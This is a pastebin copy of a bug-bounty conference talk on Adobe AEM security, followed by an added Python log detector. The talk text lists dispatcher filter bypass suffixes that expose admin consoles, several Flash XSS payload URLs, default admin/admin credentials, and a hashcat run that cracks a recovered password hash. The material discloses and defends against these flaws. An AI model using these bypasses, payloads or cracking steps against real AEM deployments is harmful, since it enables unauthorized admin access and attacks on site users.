a guest
Jan 22nd, 2019
1. @fransrosen: A story of the passive aggressive sysadmin of AEM, or "How to make a talk in 3h 35min"
2-3. Frans Rosén. Bug bounties! labs.detectify.com, twitter.com/fransrosen. I blogged about Subdomain Takeovers. Donald Trump got hacked; the hacker referred to my post as his inspiration. I broke Let's Encrypt. Live hacking! I won a boxing belt once. Namedropped in ytcracker - green hat.
4-6. 2016 – Peter Adkins: https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html, CVE-2016-0957, "The world's lamest RCE."
7-17. How AEM is structured (https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html). Diagram labels: Apache HTTP server module; Reverse proxy+filter; Pages + metadata + content; A bunch of admin-tools; "You should not have access to this" / "Or this". Also: Adobe "black magic glue"; Stuff you pay your consultants for; Shit no one's updating.
18-21. Creating pages: Author creates a new page in the repo -> Goes through the publisher nodes -> Dispatcher serves the content.
22-25. Accessing pages: Dispatcher gets the URL -> Goes through a filter (This filter is awesome, it's impossible to break, don't even dare to try) -> If all is OK, serve from publish node.
26-33. CVE-2016-0957 aka "I am two years old but I'm inside an enterprise product that no one can or dares to upgrade". (Goes through a filter: This filter is awesome, it's impossible to break, don't even dare to try.)
34. This is ridiculous
35-37. Accessing pages?.css: Dispatcher gets the URL?.css -> Every time is OK time -> Serve from publish node.
38. Publish nodes
39. Disk usage: /etc/reports/diskusage.html?.css (Disk Usage lists all repo dirs + metadata)
40-41. My fav, opensocial proxy: /libs/opensocial/proxy?url=x&.css
42. …but there's more!
43. CRX Explorer: /crx/de/index.jsp?.css
44. CRX Explorer: /crx/explorer/browser/index.jsp?.css
45. CRX Explorer Search: /crx/explorer/browser/index.jsp?.css
46. Content Repository Extreme: /crx/explorer/index.jsp?.css
47. Package Manager: /crx/packmgr/index.jsp?.css
48. Namespace Editor (no auth needed!): /crx/explorer/ui/namespace_editor.jsp?.css
49-51. bin/querybuilder: /bin/querybuilder.json?.css
52-53. bin/querybuilder for SWFs!
54-61. FLASHFEST in AEM CORE (Thx Neal Poole):
/etc/clientlibs/foundation/shared/endorsed/swf/ slideshow.swf?contentPath=%5c"))%7dcatch(e) %7balert(document.domain)%7d//
/etc/clientlibs/foundation/video/swf/player_flv_maxi.swf? onclick=jav%gascript:confirm(document.domain)
/etc/clientlibs/foundation/video/swf/StrobeMediaPlayback.swf? javascriptCallbackFunction=alert(document.domain)-String
/libs/dam/widgets/resources/swfupload/swfupload_f9.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//
/libs/cq/ui/resources/swfupload/swfupload.swf?movieName=%22]) %7dcatch(e)%7bif(!this.x)alert(document.domain),this.x=1%7d//
/etc/dam/viewers/s7sdk/2.11/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=alert(document.domain)-window
/etc/dam/viewers/s7sdk/2.9/flash/VideoPlayer.swf? loglevel=,firebug&movie=%5c%22));if(!self.x)self.x=!alert(document.domain) %7dcatch(e)%7b%7d//
/etc/dam/viewers/s7sdk/3.2/flash/VideoPlayer.swf? stagesize=1&namespacePrefix=window[/aler/.source%2b/t/.source] (document.domain)-window
62-64. Allowing anonymous publish access 🤦
65. But Peter mentioned RCE?
66-67. RCE? https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html (admin / admin)
68-69. RCE https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
70-73. Patch for CVE-2016-0957. WOHO! WOHO! THEN WHAT IS THE PROBLEM?
74-76. Problem 1 🤦 PRIORITY: nah, bro
77-78. Problem 2 💸 💸 💸 💸 💸 💸
79-82. Patch for CVE-2016-0957, IRL version
83. Bypasses, seriously: ?.js and ;%0a.css (Thank Jasmin Landry for this one)
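Added example (my code, not from the talk or from Adobe): a small detector that canonicalises the request target in access-log lines the way the dispatcher filter should have, then flags any request that reaches the admin paths listed on the slides above, marking whether a suffix such as ?.css, ?.js or ;%0a.css was used to disguise it. PROTECTED_PREFIXES, the canonicalisation rules and the log lines are assumptions constructed for the example.

```python
import re
from urllib.parse import unquote

# Admin-only paths the talk shows being served through the dispatcher on publish
# instances. The list is constructed for this example, not an AEM default.
PROTECTED_PREFIXES = ("/crx/", "/system/console", "/bin/querybuilder",
                      "/libs/opensocial/proxy", "/etc/reports/")

# Request line inside a Common Log Format entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def effective_path(target: str) -> str:
    """Canonicalise a request target to the resource the publish node resolves.
    The flawed filter matched on the raw URL suffix, so '?.css', '?.js' or
    ';%0a.css' made an admin request look like a static asset. Dropping the
    query string, ';' path parameters and control characters first means the
    decision is made on the real path (assumed to be what Sling resolves)."""
    path = target.split("?", 1)[0]            # query never selects the resource
    path = unquote(path).split(";", 1)[0]     # drop ';...' path parameters
    return re.sub(r"[\x00-\x1f]", "", path)   # drop %0a-style control chars

def classify(line: str):
    """Return a finding dict for a request to a protected path, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    raw = m.group("target")
    path = effective_path(raw)
    prefix = next((p for p in PROTECTED_PREFIXES if path.startswith(p)), None)
    if prefix is None:
        return None
    # 'disguised': the raw target differs from the canonical path, i.e. a suffix
    # or query string was used to change the apparent extension.
    return {"path": path, "prefix": prefix, "disguised": raw != path}

def scan(lines):
    """Run classify() over access-log lines and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (not from the talk); the bypass suffixes are the
# ones shown on the slides: ?.css, ?.js and ;%0a.css.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Sep/2018:11:59:23 +0200] "GET /content/site/en.html HTTP/1.1" 200 5120',
    '10.0.0.9 - - [13/Sep/2018:11:59:24 +0200] "GET /crx/de/index.jsp?.css HTTP/1.1" 200 2210',
    '10.0.0.9 - - [13/Sep/2018:11:59:25 +0200] "GET /bin/querybuilder.json?.js HTTP/1.1" 200 980',
    '10.0.0.9 - - [13/Sep/2018:11:59:26 +0200] "GET /system/console;%0a.css HTTP/1.1" 200 4400',
    '10.0.0.9 - - [13/Sep/2018:11:59:27 +0200] "GET /etc/clientlibs/foundation/main.css HTTP/1.1" 200 31000',
]
```

Running scan(SAMPLE_LOG) yields three findings, all disguised; a plain request to a protected path is still reported, with disguised set to False, because the exposure itself is the problem.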
84-86. The passive aggressive sysadmin 💊 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵 💵💵 💵💵 💵 💵💵💵 💵 + + 💊 💊💊 💊
87. I've seen this before
88-91. AEM / CRX / CRXDE / All other stuff
92-94. /system/console admin / admin
95. Report!
96-99. Search time!
100-102. WTF
$ # base64 -D is the macOS spelling; GNU coreutils uses -d. tr strips the newline xxd -p wraps in.
$ h=$(echo "6J7An/QgzU+j5gr1G0CyEexJ9xkgiIyyUzTcmaCCV5g=" | base64 -D | xxd -p | tr -d '\n')
$ echo $h
e89ec09ff420cd4fa3e60af51b40b211ec49f71920888cb25334dc99a0825798
103-105. hashcat ftw
$ echo $h > hash.txt
$ # -a 0 = straight wordlist attack, -m 1400 = raw SHA-256
$ ./hashcat.app -a 0 -m 1400 hash.txt rockyou.txt
Status.........: Cracked
Started: Thu Sep 13 11:59:23 2018
Stopped: Thu Sep 13 11:59:25 2018
ih8uall
106-109. /system/console admin / ih8uall
110-112. Report 2
113. Public bug bounty programs with AEM; Public responsible disclosure 📼; Private ones 🏨 💊💵
114. Thanks!